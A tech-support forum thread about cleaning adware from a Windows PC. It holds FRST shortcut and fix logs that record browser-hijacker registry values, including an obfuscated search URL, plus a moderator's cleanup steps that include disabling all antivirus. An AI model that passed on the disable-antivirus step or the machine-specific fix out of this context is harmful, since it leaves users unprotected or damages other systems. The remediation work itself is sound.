        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\Accessibility\Magnify.lnk → C:\Windows\System32\Magnify.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\Accessibility\Narrator.lnk → C:\Windows\System32\Narrator.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk → C:\Windows\System32\osk.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Interne t Explorer\Quick Launch\Shows Desktop.lnk → C:\Windows\System32\imageres.dll (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Interne t Explorer\Quick Launch\Window Switcher.lnk → C:\Windows\explorer.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\01 - Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\01a - Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\02 - Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\02a - Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\03 - Computer Management.lnk → C:\Windows\System32\compmgmt.msc ()
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\04 - Disk Management.lnk → C:\Windows\System32\diskmgmt.msc ()
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\07 - Event Viewer.lnk → C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\09 - Mobility Center.lnk → C:\Windows\System32\mblctr.exe (Microsoft Corporation)
        Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group2\4 - Control Panel.lnk → C:\Windows\System32\control.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk → C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk → C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerSh ell_ISE.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\PowerSh ell_ISE.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\System Tools\Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\System Tools\computer.lnk → C:\Windows\explorer.exe,-30
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\System Tools\Control Panel.lnk → C:\Windows\System32\imageres.dll (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\System Tools\File Explorer.lnk → C:\Windows\explorer.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\System Tools\Run.lnk → C:\Windows\System32\shell32.dll (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\Accessories\Notepad.lnk → C:\Windows\System32\notepad.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\Accessibility\Magnify.lnk → C:\Windows\System32\Magnify.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\Accessibility\Narrator.lnk → C:\Windows\System32\Narrator.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk → C:\Windows\System32\osk.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\In ternet Explorer\Quick Launch\Shows Desktop.lnk → C:\Windows\System32\imageres.dll (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Roaming\Microsoft\In ternet Explorer\Quick Launch\Window Switcher.lnk → C:\Windows\explorer.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\01 - Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\01a - Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\02 - Command Prompt.lnk → C:\Windows\System32\cmd.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\02a - Windows PowerShell.lnk → C:\Windows\System32\WindowsPowerShell\v1.0\powersh ell.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\03 - Computer Management.lnk → C:\Windows\System32\compmgmt.msc ()
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\04 - Disk Management.lnk → C:\Windows\System32\diskmgmt.msc ()
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\07 - Event Viewer.lnk → C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\09 - Mobility Center.lnk → C:\Windows\System32\mblctr.exe (Microsoft Corporation)
        Shortcut: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group2\4 - Control Panel.lnk → C:\Windows\System32\control.exe (Microsoft Corporation)
        Shortcut: C:\Users\Public\Desktop\BattlePing.lnk → D:\Program Files (x86)\BattlePing\BattlePing.exe (BattlePing)
        Shortcut: C:\Users\Public\Desktop\CCleaner.lnk → C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
        Shortcut: C:\Users\Public\Desktop\GeForce Experience.lnk → C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe (NVIDIA Corporation)
        Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk → C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
        Shortcut: C:\Users\Public\Desktop\Hotspot Shield.lnk → C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe (AnchorFree Inc.)
        Shortcut: C:\Users\Public\Desktop\Mozilla Firefox.lnk → C:\Program Files (x86)\Firefox\Firefox.exe (No File)
        Shortcut: C:\Users\Public\Desktop\Speccy.lnk → C:\Program Files\Speccy\Speccy64.exe (Piriform Ltd)
        Shortcut: C:\Users\Public\Desktop\TeamSpeak 3 Client.lnk → D:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe (TeamSpeak Systems GmbH)
        Shortcut: C:\Users\Public\Desktop\Zemana AntiMalware.lnk → D:\Program Files (x86)\Zemana AntiMalware\ZAM.exe (Copyright 2017.)

        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk → C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) → /7
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer\Razer Synapse\Razer Synapse.lnk → C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe (Razer Inc.) → -launch
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Uninstall.lnk → C:\Windows\SysWOW64\msiexec.exe (Microsoft Corporation) → /x {181579B5-0028-4E01-AC27-97ED80352279}
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Database Compare 2016.lnk → C:\Program Files\Microsoft Office\root\client\AppVLP.exe (Microsoft Corporation) → “C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE”
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Office 2016 Upload Center.lnk → C:\Program Files\Microsoft Office\root\client\AppVLP.exe (Microsoft Corporation) → “C:\Program Files\Microsoft Office\Root\Office16\MSOUC.EXE”
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Project Server 2016 Accounts.lnk → C:\Program Files\Microsoft Office\root\Office16\WINPROJ.EXE (Microsoft Corporation) → -ProjectProfiles
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Spreadsheet Compare 2016.lnk → C:\Program Files\Microsoft Office\root\client\AppVLP.exe (Microsoft Corporation) → “C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE”
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\DirectVobSub.lnk → C:\Windows\System32\rundll32.exe (Microsoft Corporation) → “C:\Program Files (x86)\K-Lite Codec Pack\Filters\DirectVobSub64\vsfilter.dll”,DirectVo bSub
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow VFW interface.lnk → C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) → “C:\Windows\SysWoW64\ff_vfw.dll”,configureVFW
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Audio.lnk → C:\Windows\System32\rundll32.exe (Microsoft Corporation) → “C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavaudio.ax”,OpenConfiguration
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Splitter.lnk → C:\Windows\System32\rundll32.exe (Microsoft Corporation) → “C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavsplitter.ax”,OpenConfigurati on
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Video.lnk → C:\Windows\System32\rundll32.exe (Microsoft Corporation) → “C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavvideo.ax”,OpenConfiguration
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\madVR.lnk → C:\Program Files (x86)\K-Lite Codec Pack\Filters\madVR\madHcCtrl.exe (madshi.net) → editLocalSettingsDontWait
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x64).lnk → C:\Windows\System32\rundll32.exe (Microsoft Corporation) → “C:\Windows\system32\x264vfw64.dll”,Configure
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x86).lnk → C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) → “C:\Windows\SysWoW64\x264vfw.dll”,Configure
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\Xvid VFW.lnk → C:\Windows\System32\rundll32.exe (Microsoft Corporation) → “C:\Windows\system32\xvidvfw.dll”,Configure
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox.lnk → C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) → /home
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk → C:\Windows\System32\compmgmt.msc () → /s
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk → C:\Windows\System32\eventvwr.msc () → /s
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk → C:\Windows\System32\perfmon.msc () → /s
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk → C:\Windows\System32\perfmon.exe (Microsoft Corporation) → /res
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk → C:\Windows\System32\secpol.msc () → /s
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk → C:\Windows\System32\taskschd.msc () → /s
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk → C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) → /prefetch:1
        ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk → C:\Windows\Speech\Common\sapisvr.exe (Microsoft Corporation) → -SpeechUX
        ShortcutWithArgument: C:\Users\ASUS\Desktop\Pinned to Taskbar\Ragexe.lnk → D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragexe.exe () → -1rag1
        ShortcutWithArgument: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\System Tools\Default Apps.lnk → C:\Windows\ImmersiveControlPanel\systemsettings.ex e (Microsoft Corporation) → page=SettingsPageAppsDefaults
        ShortcutWithArgument: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\System Tools\Devices.lnk → C:\Windows\ImmersiveControlPanel\systemsettings.ex e (Microsoft Corporation) → page=SettingsPagePCSystemDevices
        ShortcutWithArgument: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\Se ndTo\Fax Recipient.lnk → C:\Windows\System32\WFS.exe (Microsoft Corporation) → /SendTo
        ShortcutWithArgument: C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\Se ndTo\Skype.lnk → C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.) → /sendto:
        ShortcutWithArgument: C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Ragexe.lnk → D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragexe.exe () → -1rag1
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\04-1 - Network Connections.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\05 - Device Manager.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.DeviceManager
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\06 - System.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.System
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\08 - Power Options.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.PowerOptions
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group3\10 - Programs and Features.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.ProgramsAndFeatures
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group2\1 - Run.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group2\2 - Search.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group2\3 - Windows Explorer.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group2\5 - Task Manager.lnk → C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) → /0
        ShortcutWithArgument: C:\Users\ASUS\AppData\Local\Microsoft\Windows\WinX \Group1\1 - Desktop.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
        ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\System Tools\Default Apps.lnk → C:\Windows\ImmersiveControlPanel\systemsettings.ex e (Microsoft Corporation) → page=SettingsPageAppsDefaults
        ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows \Start Menu\Programs\System Tools\Devices.lnk → C:\Windows\ImmersiveControlPanel\systemsettings.ex e (Microsoft Corporation) → page=SettingsPagePCSystemDevices
        ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows \SendTo\Fax Recipient.lnk → C:\Windows\System32\WFS.exe (Microsoft Corporation) → /SendTo
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\04-1 - Network Connections.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\05 - Device Manager.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.DeviceManager
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\06 - System.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.System
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\08 - Power Options.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.PowerOptions
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group3\10 - Programs and Features.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.ProgramsAndFeatures
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group2\1 - Run.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group2\2 - Search.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group2\3 - Windows Explorer.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group2\5 - Task Manager.lnk → C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) → /0
        ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\W inX\Group1\1 - Desktop.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\System Tools\Default Apps.lnk → C:\Windows\ImmersiveControlPanel\systemsettings.ex e (Microsoft Corporation) → page=SettingsPageAppsDefaults
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\Start Menu\Programs\System Tools\Devices.lnk → C:\Windows\ImmersiveControlPanel\systemsettings.ex e (Microsoft Corporation) → page=SettingsPagePCSystemDevices
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Roaming\Microsoft\Wi ndows\SendTo\Fax Recipient.lnk → C:\Windows\System32\WFS.exe (Microsoft Corporation) → /SendTo
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\04-1 - Network Connections.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\05 - Device Manager.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.DeviceManager
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\06 - System.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.System
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\08 - Power Options.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.PowerOptions
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group3\10 - Programs and Features.lnk → C:\Windows\System32\control.exe (Microsoft Corporation) → /name Microsoft.ProgramsAndFeatures
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group2\1 - Run.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group2\2 - Search.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group2\3 - Windows Explorer.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group2\5 - Task Manager.lnk → C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) → /0
        ShortcutWithArgument: C:\Users\defaultuser0\AppData\Local\Microsoft\Wind ows\WinX\Group1\1 - Desktop.lnk → C:\Windows\explorer.exe (Microsoft Corporation) → shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}

        InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy\Speccy Homepage.url → URL: hxxp://www.piriform.com/speccy
        InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Ragnarok Online Website.url → URL: hxxp://iro.ragnarokonline.com
        InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Help\Online Codec Help.url → URL: hxxp://www.codecguide.com/help.htm
        InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\Website.url → URL: hxxp://mh-nexus.de/hxd/
        InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox Website.URL →
        InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner Homepage.url → URL: hxxp://www.piriform.com/ccleaner
        InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Pro 3 ReadMe.url → URL: hxxp://go.acdsystems.com/client/en/301878
        InternetURL: C:\Users\ASUS\Favorites\Bing.url → URL: hxxp://go.microsoft.com/fwlink/p/?LinkId=255142
        InternetURL: C:\Users\ASUS\Favorites\The NeoSmart Files.url → URL: hxxp://neosmart.net/blog/feed/

        ==================== End of Shortcut.txt =============================

        Comment

        • herrick
          PCHF Member
          • Mar 2017
          • 55

          #5
          Oh btw i just deleted something called standuck? inside the folder it had google chrome but it kinda fishy so i download a new google chrome and deleted the standuck. It was located in my program file

          Comment

          • Malnutrition
            PCHF Moderator
            • Jul 2016
            • 7045

            #6
            FRST Fix.

            Click Here to download fixlist.

            Download attached fixlist.txt file and save it to the Desktop. NOTE. It’s important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST/FRST64 and press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run. When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

            ClearLNK

            Download ClearLNK save it to your desktop.
            Drag the file Shortcut.txt made with FRST earlier.
            As per picture.
            A report on the work as a file ClearLNK- .log
            Will be produced, post that log.

            https://pchelpforum.net/proxy.php?image=https%3A%2F%2Fup2sha.re%2Fuploads% 2F2015%2F3%2FBPD7B3BAgEQl.gif&hash=f65630ba2178027 f4643224f28999e44

            Rogue Killer Scan.

            Download RogueKiller – (Portable) – from one of the following links and save it to your Desktop:

            Link 1
            Link 2


            [ul]
            [li]Close all other the running programs[/li][li]Disable ALL Antivirus – Antimalware – Applications.[/li][li]Right Click Rogue Killer and Run as Administrator.[/li][li]Click the Start Scan button.[/li][li]Allow the scan to run – it can take ten minutes or more.[/li][li]Once the scan is complete check All items for removal.[/li][li]https://pchelpforum.net/attachments/...5-54-png.1658/ [/li]
            [li]After All items are checked then press Remove Selected.[/li]
            [li]Wait until the Status box shows Deleting Finished.[/li][li]Click on open report – then open txt[/li]
            [li]Copy the content of the report and paste it here in your next reply.[/li][/ul]

            Comment

            • herrick
              PCHF Member
              • Mar 2017
              • 55

              #7
              [HEADING=1]FIXLOG.TXT
              Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
              Ran by ASUS (01-04-2017 04:41:33) Run:2
              Running from C:\Users\ASUS\Desktop
              Loaded Profiles: ASUS (Available Profiles: defaultuser0 & ASUS)
              Boot Mode: Normal[/HEADING]
              fixlist content:


              start
              emptytemp:
              CloseProcesses:
              CreateRestorePoint:
              HKLM-x32...\Run: =>
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [AdobeBridge] =>
              HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [BingSvc] => C:\Users\ASUS\AppData\Local\Microsoft\BingSvc\Bing Svc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
              HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489487534&z=8f8c54b40a0e703f2b251d5g3 zbbbtbzeb8m1w0c8m&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX
              HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
              HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1487663291&z=b41367c29dd1525fd732f00g6 zeb1m2qfqec0odt6o&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX&q={searchTerms}
              HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
              HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489487534&z=8f8c54b40a0e703f2b251d5g3 zbbbtbzeb8m1w0c8m&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX
              HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
              HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1487663291&z=b41367c29dd1525fd732f00g6 zeb1m2qfqec0odt6o&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX&q={searchTerms}
              SearchScopes: HKLM → DefaultScope value is missing
              SearchScopes: HKLM → {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
              SearchScopes: HKLM-x32 → DefaultScope {ielnksrch} URL =
              SearchScopes: HKLM-x32 → ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPmlMHrD_xlOeu95O0THUbBGqXOZYiJqh9rdyQRqZi 95INKcagYek6XEcaeXeCQH6nCtl08-tJY-msx_wiZn0BwWhNvPh6hbwd0j-JBuWgd928ntQba5oZQQYTZWVPMNJfQN7n7XKwDKWAPdYWK5FLu oP_3gQJ_RiDsOyIRTq0&q={searchTerms}
